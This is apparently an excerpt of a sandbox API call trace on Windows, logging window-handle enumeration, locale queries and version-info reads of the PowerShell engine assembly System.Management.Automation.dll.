	[0559.972] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x158c
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1588
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1584
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1580
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x157c
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1488
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1404
	[0559.972] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x11b8
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xbd4
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe0c
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xd30
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe70
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x13b8
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe20
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe2c
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe00
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe04
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc94
	[0559.973] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x13b0
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x13ac
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x13a8
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1374
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x132c
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1328
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x12d0
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x12cc
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x12c8
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1290
	[0559.974] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1218
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1214
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x11ec
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x11e8
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x11cc
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1140
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe6c
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x6e8
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc6c
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf94
	[0559.975] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xffc
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf74
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf08
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf0c
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xed8
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xe90
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xea8
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfa8
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfbc
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfb8
	[0559.976] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfb4
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfb0
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfac
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfc0
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xfd0
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf88
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf84
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xf80
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xde0
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xddc
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xdd8
	[0559.977] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xd34
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xd10
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xd0c
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc9c
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc74
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc1c
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xc08
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xabc
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x24c
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xbb0
	[0559.978] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xbfc
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb10
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x374
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x368
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb28
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xae8
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb14
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x95c
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa8c
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x46c
	[0559.979] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb3c
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa90
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xad0
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa9c
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xaa0
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb1c
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x7e0
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa74
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x694
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xa28
	[0559.980] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x9b0
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x8d8
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x940
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x93c
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4ec
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x150
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x720
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x3c4
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x7d4
	[0560.033] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x6c8
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb54
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb54
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb5c
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x838
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x818
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x5b8
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x494
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x1ec
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x440
	[0560.034] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x7e8
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x730
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x2c8
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x31c
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x330
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x128
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x5c8
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x6f8
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x358
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x73c
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0xb0
	[0560.035] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x250
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x240
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x790
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x61c
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x568
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x538
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x540
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x460
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x79c
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x4e0
	[0560.036] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x460
	[0560.037] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x12dd60 | out: lpdwProcessId=0x12dd60) returned 0x778
	[0560.040] WerSetFlags () returned 0x0
	[0560.049] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0561.552] CoTaskMemFree (pv=0x0) 
	[0561.553] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12e0c8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12e0c0 | out: pulNumLanguages=0x12e0c8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12e0c0) returned 1
	[0561.553] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12e0c8, pwszLanguagesBuffer=0x2c5edc0, pcchLanguagesBuffer=0x12e0c0 | out: pulNumLanguages=0x12e0c8, pwszLanguagesBuffer=0x2c5edc0, pcchLanguagesBuffer=0x12e0c0) returned 1
	[0561.558] CoTaskMemAlloc (cb=0x24) returned 0x30beb0
	[0561.558] GetUserDefaultLocaleName (in: lpLocaleName=0x30beb0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0561.559] CoTaskMemFree (pv=0x30beb0) 
	[0561.583] CoTaskMemAlloc (cb=0x104) returned 0x311ea0
	[0561.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x311ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.583] CoTaskMemFree (pv=0x311ea0) 
	[0561.585] CoTaskMemAlloc (cb=0x104) returned 0x311ea0
	[0561.585] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x311ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.585] CoTaskMemFree (pv=0x311ea0) 
	[0561.587] CoTaskMemAlloc (cb=0x104) returned 0x311ea0
	[0561.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x311ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0561.587] CoTaskMemFree (pv=0x311ea0) 
	[0563.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.138] SetErrorMode (uMode=0x1) returned 0x1
	[0563.138] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12dd40 | out: lpFileInformation=0x12dd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0563.138] SetErrorMode (uMode=0x1) returned 0x1
	[0563.138] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dfb0 | out: lpdwHandle=0x12dfb0) returned 0x94c
	[0563.140] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c62650 | out: lpData=0x2c62650) returned 1
	[0563.141] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12df28, puLen=0x12df20 | out: lplpBuffer=0x12df28*=0x2c626ec, puLen=0x12df20) returned 1
	[0563.141] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c627c8, puLen=0x12de90) returned 1
	[0563.141] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0563.141] CoTaskMemAlloc (cb=0x2e) returned 0x3111d0
	[0563.141] lstrcpyW (in: lpString1=0x3111d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0563.141] CoTaskMemFree (pv=0x3111d0) 
	[0563.141] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c6281c, puLen=0x12de90) returned 1
	[0563.141] lstrlenW (lpString="System.Management.Automation") returned 28
	[0563.141] CoTaskMemAlloc (cb=0x3c) returned 0x30f9d0
	[0563.141] lstrcpyW (in: lpString1=0x30f9d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0563.141] CoTaskMemFree (pv=0x30f9d0) 
	[0563.141] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c62878, puLen=0x12de90) returned 1
	[0563.141] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0563.141] CoTaskMemAlloc (cb=0x20) returned 0x30bf70
	[0563.141] lstrcpyW (in: lpString1=0x30bf70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0563.141] CoTaskMemFree (pv=0x30bf70) 
	[0563.141] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c628b8, puLen=0x12de90) returned 1
	[0563.141] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0563.141] CoTaskMemAlloc (cb=0x44) returned 0x30f9d0
	[0563.141] lstrcpyW (in: lpString1=0x30f9d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0563.141] CoTaskMemFree (pv=0x30f9d0) 
	[0563.141] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c62920, puLen=0x12de90) returned 1
	[0563.141] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0563.141] CoTaskMemAlloc (cb=0x76) returned 0x2a0660
	[0563.141] lstrcpyW (in: lpString1=0x2a0660, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0563.141] CoTaskMemFree (pv=0x2a0660) 
	[0563.141] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c629bc, puLen=0x12de90) returned 1
	[0563.141] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0563.142] CoTaskMemAlloc (cb=0x44) returned 0x30f9d0
	[0563.142] lstrcpyW (in: lpString1=0x30f9d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0563.142] CoTaskMemFree (pv=0x30f9d0) 
	[0563.142] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c62a20, puLen=0x12de90) returned 1
	[0563.142] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0563.142] CoTaskMemAlloc (cb=0x58) returned 0x287460
	[0563.142] lstrcpyW (in: lpString1=0x287460, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0563.142] CoTaskMemFree (pv=0x287460) 
	[0563.142] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c62a9c, puLen=0x12de90) returned 1
	[0563.142] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0563.142] CoTaskMemAlloc (cb=0x20) returned 0x30bf70
	[0563.142] lstrcpyW (in: lpString1=0x30bf70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0563.142] CoTaskMemFree (pv=0x30bf70) 
	[0563.142] VerQueryValueW (in: pBlock=0x2c62650, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12de98, puLen=0x12de90 | out: lplpBuffer=0x12de98*=0x2c62744, puLen=0x12de90) returned 1
	[0563.142] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
